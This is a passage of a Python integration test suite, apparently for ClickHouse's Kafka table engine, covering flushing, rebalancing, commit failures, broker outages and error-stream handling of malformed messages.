result = instance.query('SELECT uniqExact(ts) = 2, count() >= 15 FROM test.view')
cancel.set()
kafka_thread.join()
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('1 1')
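# Check that a block is flushed as soon as kafka_max_block_size rows are collected,
# without waiting for kafka_flush_interval_ms (set to 120000 ms here).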
@pytest.mark.timeout(90)
def test_kafka_flush_by_block_size(kafka_cluster):
cancel = threading.Event()
def produce():
while not cancel.is_set():
messages = []
messages.append(json.dumps({'key': 0, 'value': 0}))
kafka_produce(kafka_cluster, 'flush_by_block_size', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'flush_by_block_size',
kafka_group_name = 'flush_by_block_size',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_flush_interval_ms = 120000, /* should not flush by time during test */
kafka_row_delimiter = '\\n';
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
# Wait for Kafka engine to consume this data
while 1 != int(instance.query(
"SELECT count() FROM system.parts WHERE database = 'test' AND table = 'view' AND name = 'all_1_1_0'")):
time.sleep(0.5)
cancel.set()
kafka_thread.join()
# More flushes can happen during the test; we only need to check the result of the first flush (the part named all_1_1_0).
result = instance.query("SELECT count() FROM test.view WHERE _part='all_1_1_0'")
# logging.debug(result)
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
# 100 = first poll should return 100 messages (and rows)
# not waiting for stream_flush_interval_ms
assert int(
result) == 100, 'Messages from kafka should be flushed when block of size kafka_max_block_size is formed!'
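# Multi-row messages over 10 partitions with a small kafka_max_block_size: a single bulk of messages
# is committed in several parts; the test checks that nothing is lost or duplicated.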
@pytest.mark.timeout(600)
def test_kafka_lot_of_partitions_partial_commit_of_bulk(kafka_cluster):
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions2", num_partitions=10, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions2',
kafka_group_name = 'topic_with_multiple_partitions2',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 211,
kafka_flush_interval_ms = 500;
CREATE TABLE test.view (key UInt64, value UInt64)
ENGINE = MergeTree()
ORDER BY key;
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka;
''')
messages = []
count = 0
for dummy_msg in range(1000):
rows = []
for dummy_row in range(random.randrange(3, 10)):
count = count + 1
rows.append(json.dumps({'key': count, 'value': count}))
messages.append("\n".join(rows))
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions2', messages)
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(count))
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
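# Spin up 11 consumers in the same consumer group one by one, then drop all but the last,
# forcing repeated rebalances; every key must end up in test.destination exactly once.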
@pytest.mark.timeout(1200)
def test_kafka_rebalance(kafka_cluster):
NUMBER_OF_CONCURRENT_CONSUMERS = 11
instance.query('''
DROP TABLE IF EXISTS test.destination;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# kafka_cluster.open_bash_shell('instance')
# time.sleep(2)
admin_client = KafkaAdminClient(bootstrap_servers="localhost:{}".format(kafka_cluster.kafka_port))
topic_list = []
topic_list.append(NewTopic(name="topic_with_multiple_partitions", num_partitions=11, replication_factor=1))
admin_client.create_topics(new_topics=topic_list, validate_only=False)
cancel = threading.Event()
msg_index = [0]
def produce():
while not cancel.is_set():
messages = []
for _ in range(59):
messages.append(json.dumps({'key': msg_index[0], 'value': msg_index[0]}))
msg_index[0] += 1
kafka_produce(kafka_cluster, 'topic_with_multiple_partitions', messages)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
table_name = 'kafka_consumer{}'.format(consumer_index)
logging.debug(("Setting up {}".format(table_name)))
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
CREATE TABLE test.{0} (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'topic_with_multiple_partitions',
kafka_group_name = 'rebalance_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 33,
kafka_flush_interval_ms = 500;
CREATE MATERIALIZED VIEW test.{0}_mv TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp,
'{0}' as _consumed_by
FROM test.{0};
'''.format(table_name))
# kafka_cluster.open_bash_shell('instance')
# Wait for test.kafka_consumerX to start consuming ...
instance.wait_for_log_line('kafka_consumer{}.*Polled offset [0-9]+'.format(consumer_index))
cancel.set()
# Leave the last consumer working intentionally (to finish consuming after all rebalances)
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS - 1):
logging.debug(("Dropping test.kafka_consumer{}".format(consumer_index)))
instance.query('DROP TABLE IF EXISTS test.kafka_consumer{} SYNC'.format(consumer_index))
# logging.debug(instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination'))
# kafka_cluster.open_bash_shell('instance')
while 1:
messages_consumed = int(instance.query('SELECT uniqExact(key) FROM test.destination'))
if messages_consumed >= msg_index[0]:
break
time.sleep(1)
logging.debug(("Waiting for finishing consuming (have {}, should be {})".format(messages_consumed, msg_index[0])))
logging.debug((instance.query('SELECT count(), uniqExact(key), max(key) + 1 FROM test.destination')))
# Some queries to debug...
# SELECT * FROM test.destination where key in (SELECT key FROM test.destination group by key having count() <> 1)
# select number + 1 as key from numbers(4141) x left join test.destination using (key) where test.destination.key = 0;
# SELECT * FROM test.destination WHERE key between 2360 and 2370 order by key;
# select _partition from test.destination group by _partition having count() <> max(_offset) + 1;
# select toUInt64(0) as _partition, number + 1 as _offset from numbers(400) x left join test.destination using (_partition,_offset) where test.destination.key = 0 order by _offset;
# SELECT * FROM test.destination WHERE _partition = 0 and _offset between 220 and 240 order by _offset;
# CREATE TABLE test.reference (key UInt64, value UInt64) ENGINE = Kafka SETTINGS kafka_broker_list = 'kafka1:19092',
# kafka_topic_list = 'topic_with_multiple_partitions',
# kafka_group_name = 'rebalance_test_group_reference',
# kafka_format = 'JSONEachRow',
# kafka_max_block_size = 100000;
#
# CREATE MATERIALIZED VIEW test.reference_mv Engine=Log AS
# SELECT key, value, _topic,_key,_offset, _partition, _timestamp, 'reference' as _consumed_by
# FROM test.reference;
#
# select * from test.reference_mv left join test.destination using (key,_topic,_offset,_partition) where test.destination._consumed_by = '';
result = int(instance.query('SELECT count() == uniqExact(key) FROM test.destination'))
for consumer_index in range(NUMBER_OF_CONCURRENT_CONSUMERS):
logging.debug(("kafka_consumer{}".format(consumer_index)))
table_name = 'kafka_consumer{}'.format(consumer_index)
instance.query('''
DROP TABLE IF EXISTS test.{0};
DROP TABLE IF EXISTS test.{0}_mv;
'''.format(table_name))
instance.query('''
DROP TABLE IF EXISTS test.destination;
''')
kafka_thread.join()
assert result == 1, 'Messages from kafka get duplicated!'
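# Break the ZooKeeper connection between the write prefix and the write suffix of an insert into a
# ReplicatedMergeTree view and check that all 22 rows still arrive exactly once (no holes).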
@pytest.mark.timeout(120)
def test_kafka_no_holes_when_write_suffix_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'no_holes_when_write_suffix_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view;
DROP TABLE IF EXISTS test.consumer;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'no_holes_when_write_suffix_failed',
kafka_group_name = 'no_holes_when_write_suffix_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 2000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = ReplicatedMergeTree('/clickhouse/kafkatest/tables/no_holes_when_write_suffix_failed', 'node1')
ORDER BY key;
''')
# Initialize the PartitionManager early (it starts a container)
pm = PartitionManager()
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# The tricky part here is that the disconnect should happen after the write prefix, but before the write suffix.
# We have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages",
# while the materialized view is working, to inject the ZooKeeper failure.
pm.drop_instance_zk_connections(instance)
instance.wait_for_log_line("Error.*(session has been expired|Connection loss).*while write prefix to view")
pm.heal_all()
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
# kafka_cluster.open_bash_shell('instance')
instance.query('''
DROP TABLE test.consumer;
DROP TABLE test.view;
''')
assert TSV(result) == TSV('22\t22\t22')
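# A failing SELECT from a Kafka table with an empty kafka_group_name must not bring the server down,
# even though the consumer destructor may throw; the final SELECT 1 confirms the server is still alive.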
@pytest.mark.timeout(120)
def test_exception_from_destructor(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query_and_get_error('''
SELECT * FROM test.kafka;
''')
instance.query('''
DROP TABLE test.kafka;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'xyz',
kafka_group_name = '',
kafka_format = 'JSONEachRow';
''')
instance.query('''
DROP TABLE test.kafka;
''')
# kafka_cluster.open_bash_shell('instance')
assert TSV(instance.query('SELECT 1')) == TSV('1')
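# DROP the Kafka table while messages are still being produced and re-create it with a different block size;
# offsets of not-yet-processed messages must be committed correctly so that no data is lost.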
@pytest.mark.timeout(120)
def test_commits_of_unprocessed_messages_on_drop(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
instance.query('''
DROP TABLE IF EXISTS test.destination SYNC;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# Wait for test.kafka_consumer to start consuming
instance.wait_for_log_line('Committed offset [0-9]+')
cancel = threading.Event()
i = [2]
def produce():
while not cancel.is_set():
messages = []
for _ in range(113):
messages.append(json.dumps({'key': i[0], 'value': i[0]}))
i[0] += 1
kafka_produce(kafka_cluster, 'commits_of_unprocessed_messages_on_drop', messages)
time.sleep(0.5)
kafka_thread = threading.Thread(target=produce)
kafka_thread.start()
time.sleep(4)
instance.query('''
DROP TABLE test.kafka SYNC;
''')
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'commits_of_unprocessed_messages_on_drop',
kafka_group_name = 'commits_of_unprocessed_messages_on_drop_test_group',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 10000,
kafka_flush_interval_ms = 1000;
''')
cancel.set()
instance.wait_for_log_line('kafka.*Stalled', repetitions=5)
# kafka_cluster.open_bash_shell('instance')
# SELECT key, _timestamp, _offset FROM test.destination where runningDifference(key) <> 1 ORDER BY key;
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.destination')
logging.debug(result)
instance.query('''
DROP TABLE test.kafka_consumer SYNC;
DROP TABLE test.destination SYNC;
''')
kafka_thread.join()
assert TSV(result) == TSV('{0}\t{0}\t{0}'.format(i[0] - 1)), 'Missing data!'
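# Consume a 20000-message backlog and make sure the stream is not rescheduled with long pauses:
# the spread between the first and last consume timestamps must stay under 8 seconds.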
@pytest.mark.timeout(300)
def test_bad_reschedule(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000,
kafka_flush_interval_ms = 1000;
CREATE MATERIALIZED VIEW test.destination Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
instance.wait_for_log_line("Committed offset 20000")
assert int(instance.query("SELECT max(consume_ts) - min(consume_ts) FROM test.destination")) < 8
@pytest.mark.timeout(300)
def test_kafka_duplicates_when_commit_failed(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': 'x' * 300}) for j in range(22)]
kafka_produce(kafka_cluster, 'duplicates_when_commit_failed', messages)
instance.query('''
DROP TABLE IF EXISTS test.view SYNC;
DROP TABLE IF EXISTS test.consumer SYNC;
CREATE TABLE test.kafka (key UInt64, value String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'duplicates_when_commit_failed',
kafka_group_name = 'duplicates_when_commit_failed',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 20,
kafka_flush_interval_ms = 1000;
CREATE TABLE test.view (key UInt64, value String)
ENGINE = MergeTree()
ORDER BY key;
''')
instance.query('''
CREATE MATERIALIZED VIEW test.consumer TO test.view AS
SELECT * FROM test.kafka
WHERE NOT sleepEachRow(0.25);
''')
instance.wait_for_log_line("Polled batch of 20 messages")
# The tricky part here is that the disconnect should happen after the write prefix, but before the commit.
# We have a 0.25 (sleepEachRow) * 20 (rows) = 5 sec window after "Polled batch of 20 messages",
# while the materialized view is working, to inject the failure (here: pausing the Kafka broker container).
kafka_cluster.pause_container('kafka1')
# If we restore the connection too fast (<30 sec), librdkafka will not report any timeout
# (an alternative is to decrease the default session timeouts for librdkafka).
#
# When the delay is too long (>50 sec), the broker will decide to remove us from the consumer group
# and will start answering "Broker: Unknown member".
instance.wait_for_log_line("Exception during commit attempt: Local: Waiting for coordinator", timeout=45)
instance.wait_for_log_line("All commit attempts failed", look_behind_lines=500)
kafka_cluster.unpause_container('kafka1')
# kafka_cluster.open_bash_shell('instance')
instance.wait_for_log_line("Committed offset 22")
result = instance.query('SELECT count(), uniqExact(key), max(key) FROM test.view')
logging.debug(result)
instance.query('''
DROP TABLE test.consumer SYNC;
DROP TABLE test.view SYNC;
''')
# After https://github.com/edenhill/librdkafka/issues/2631
# the timeout triggers a rebalance, which makes further commits to the topic impossible
# after getting back online. So we get duplicates in that scenario, but we report that situation properly.
assert TSV(result) == TSV('42\t22\t22')
# If we reach the end of a partition, we keep polling until kafka_max_block_size or flush_interval is reached.
# That behavior is a bit questionable - we could instead take bigger pauses between polls,
# doing more work in a single pass and giving the thread more rest.
# But under spiky loads on the Kafka topic the current contract is more predictable and
# easier to understand, so let's keep it as is for now.
# We can also reach EOF because we drained librdkafka's internal queue too fast.
@pytest.mark.timeout(120)
def test_premature_flush_on_eof(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'premature_flush_on_eof',
kafka_group_name = 'premature_flush_on_eof',
kafka_format = 'JSONEachRow';
SELECT * FROM test.kafka LIMIT 1;
CREATE TABLE test.destination (
key UInt64,
value UInt64,
_topic String,
_key String,
_offset UInt64,
_partition UInt64,
_timestamp Nullable(DateTime('UTC')),
_consumed_by LowCardinality(String)
)
ENGINE = MergeTree()
ORDER BY key;
''')
# Messages created here will be consumed immediately after the MV is created,
# reaching topic EOF.
# But we should not flush immediately after reaching EOF, because
# the next poll can return more data; we should respect kafka_flush_interval_ms
# and try to form a bigger block.
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(1)]
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
instance.query('''
CREATE MATERIALIZED VIEW test.kafka_consumer TO test.destination AS
SELECT
key,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.kafka;
''')
# All subscriptions/assignments were done during the SELECT, so data starts flowing into test.destination
# immediately after the MV is created.
instance.wait_for_log_line("Polled batch of 1 messages")
instance.wait_for_log_line("Stalled")
# produce more messages after delay
kafka_produce(kafka_cluster, 'premature_flush_on_eof', messages)
# The data has not been flushed yet (it will be flushed 7.5 sec after the MV is created)
assert int(instance.query("SELECT count() FROM test.destination")) == 0
instance.wait_for_log_line("Committed offset 2")
# It should be a single part, i.e. a single insert
result = instance.query('SELECT _part, count() FROM test.destination group by _part')
assert TSV(result) == TSV('all_1_1_0\t2')
instance.query('''
DROP TABLE test.kafka_consumer;
DROP TABLE test.destination;
''')
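# The broker is paused before the Kafka table and MV are created; once it is unpaused,
# consumption must recover and eventually deliver all 20000 messages.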
@pytest.mark.timeout(180)
def test_kafka_unavailable(kafka_cluster):
messages = [json.dumps({'key': j + 1, 'value': j + 1}) for j in range(20000)]
kafka_produce(kafka_cluster, 'test_bad_reschedule', messages)
kafka_cluster.pause_container('kafka1')
instance.query('''
CREATE TABLE test.test_bad_reschedule (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'test_bad_reschedule',
kafka_group_name = 'test_bad_reschedule',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 1000;
CREATE MATERIALIZED VIEW test.destination_unavailable Engine=Log AS
SELECT
key,
now() as consume_ts,
value,
_topic,
_key,
_offset,
_partition,
_timestamp
FROM test.test_bad_reschedule;
''')
instance.query("SELECT * FROM test.test_bad_reschedule")
instance.query("SELECT count() FROM test.destination_unavailable")
# long enough to trigger the issue
time.sleep(30)
kafka_cluster.unpause_container('kafka1')
while int(instance.query("SELECT count() FROM test.destination_unavailable")) < 20000:
print("Waiting for consume")
time.sleep(1)
@pytest.mark.timeout(180)
def test_kafka_issue14202(kafka_cluster):
"""
INSERT INTO Kafka engine from an empty SELECT subquery was leading to failure
"""
instance.query('''
CREATE TABLE test.empty_table (
dt Date,
some_string String
)
ENGINE = MergeTree()
PARTITION BY toYYYYMM(dt)
ORDER BY some_string;
CREATE TABLE test.kafka_q (t UInt64, `some_string` String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'issue14202',
kafka_group_name = 'issue14202',
kafka_format = 'JSONEachRow';
''')
instance.query(
'INSERT INTO test.kafka_q SELECT t, some_string FROM ( SELECT dt AS t, some_string FROM test.empty_table )')
# check instance is alive
assert TSV(instance.query('SELECT 1')) == TSV('1')
instance.query('''
DROP TABLE test.empty_table;
DROP TABLE test.kafka_q;
''')
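# Plain CSV consumption check, but with kafka_num_consumers = 4 and kafka_thread_per_consumer = 1.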
@pytest.mark.timeout(180)
def test_kafka_csv_with_thread_per_consumer(kafka_cluster):
instance.query('''
CREATE TABLE test.kafka (key UInt64, value UInt64)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'csv_with_thread_per_consumer',
kafka_group_name = 'csv_with_thread_per_consumer',
kafka_format = 'CSV',
kafka_row_delimiter = '\\n',
kafka_num_consumers = 4,
kafka_thread_per_consumer = 1;
''')
messages = []
for i in range(50):
messages.append('{i}, {i}'.format(i=i))
kafka_produce(kafka_cluster, 'csv_with_thread_per_consumer', messages)
result = ''
while True:
result += instance.query('SELECT * FROM test.kafka', ignore_error=True)
if kafka_check_result(result):
break
kafka_check_result(result, True)
def random_string(size=8):
return ''.join(random.choices(string.ascii_uppercase + string.digits, k=size))
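# With kafka_handle_error_mode = 'stream', rows that fail to parse are exposed through _raw_message/_error
# instead of breaking consumption; half of the 128 messages are malformed, so 64 rows go to each materialized view.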
@pytest.mark.timeout(180)
def test_kafka_engine_put_errors_to_stream(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream',
kafka_group_name = 'kafka_engine_put_errors_to_stream',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 128,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(json.dumps({'i': i, 's': random_string(8)}))
else:
# Unexpected json content for table test.kafka.
messages.append(json.dumps({'i': 'n_' + random_string(4), 's': random_string(8)}))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream', messages)
instance.wait_for_log_line("Committed offset 128")
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('64')
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
def gen_normal_json():
return '{"i":1000, "s":"ABC123abc"}'
def gen_malformed_json():
return '{"i":"n1000", "s":"1000"}'
def gen_message_with_jsons(jsons = 10, malformed = 0):
s = io.StringIO()
# We don't care at which position the error is added
# (the whole broken message is skipped), but we need to be
# sure that at least one error is added,
# otherwise the test will fail.
error_pos = random.randint(0,jsons-1)
for i in range (jsons):
if malformed and i == error_pos:
s.write(gen_malformed_json())
else:
s.write(gen_normal_json())
s.write(' ')
return s.getvalue()
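# Same as above, but every Kafka message carries 10 JSON rows and a malformed row poisons the whole message:
# 64 good messages * 10 rows = 640 good rows, and 64 messages end up in the error stream.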
def test_kafka_engine_put_errors_to_stream_with_random_malformed_json(kafka_cluster):
instance.query('''
DROP TABLE IF EXISTS test.kafka;
DROP TABLE IF EXISTS test.kafka_data;
DROP TABLE IF EXISTS test.kafka_errors;
CREATE TABLE test.kafka (i Int64, s String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_group_name = 'kafka_engine_put_errors_to_stream_with_random_malformed_json',
kafka_format = 'JSONEachRow',
kafka_max_block_size = 100,
kafka_poll_max_batch_size = 1,
kafka_handle_error_mode = 'stream';
CREATE MATERIALIZED VIEW test.kafka_data (i Int64, s String)
ENGINE = MergeTree
ORDER BY i
AS SELECT i, s FROM test.kafka WHERE length(_error) == 0;
CREATE MATERIALIZED VIEW test.kafka_errors (topic String, partition Int64, offset Int64, raw String, error String)
ENGINE = MergeTree
ORDER BY (topic, offset)
AS SELECT
_topic AS topic,
_partition AS partition,
_offset AS offset,
_raw_message AS raw,
_error AS error
FROM test.kafka WHERE length(_error) > 0;
''')
messages = []
for i in range(128):
if i % 2 == 0:
messages.append(gen_message_with_jsons(10, 1))
else:
messages.append(gen_message_with_jsons(10, 0))
kafka_produce(kafka_cluster, 'kafka_engine_put_errors_to_stream_with_random_malformed_json', messages)
instance.wait_for_log_line("Committed offset 128")
# 64 good messages, each containing 10 rows
assert TSV(instance.query('SELECT count() FROM test.kafka_data')) == TSV('640')
# 64 bad messages, each containing some broken row
assert TSV(instance.query('SELECT count() FROM test.kafka_errors')) == TSV('64')
instance.query('''
DROP TABLE test.kafka;
DROP TABLE test.kafka_data;
DROP TABLE test.kafka_errors;
''')
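# For every supported format below, the last data sample is a deliberately broken message;
# the 'expected' entry is the raw_message/error pair it should produce in the error stream.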
@pytest.mark.timeout(120)
def test_kafka_formats_with_broken_message(kafka_cluster):
# The data was dumped from ClickHouse itself in the following manner:
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow': {
'data_sample': [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
# broken message
'{"id":"0","blockNo":"BAD","val1":"AM","val2":0.5,"val3":1}',
],
'expected':'''{"raw_message":"{\\"id\\":\\"0\\",\\"blockNo\\":\\"BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}","error":"Cannot parse input: expected '\\"' before: 'BAD\\",\\"val1\\":\\"AM\\",\\"val2\\":0.5,\\"val3\\":1}': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable': True,
},
# JSONAsString doesn't fit this test and is tested separately
'JSONCompactEachRow': {
'data_sample': [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
# broken message
'["0", "BAD", "AM", 0.5, 1]',
],
'expected':'''{"raw_message":"[\\"0\\", \\"BAD\\", \\"AM\\", 0.5, 1]","error":"Cannot parse input: expected '\\"' before: 'BAD\\", \\"AM\\", 0.5, 1]': (while reading the value of key blockNo)"}''',
'supports_empty_value': True,
'printable':True,
},
'JSONCompactEachRowWithNamesAndTypes': {
'data_sample': [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
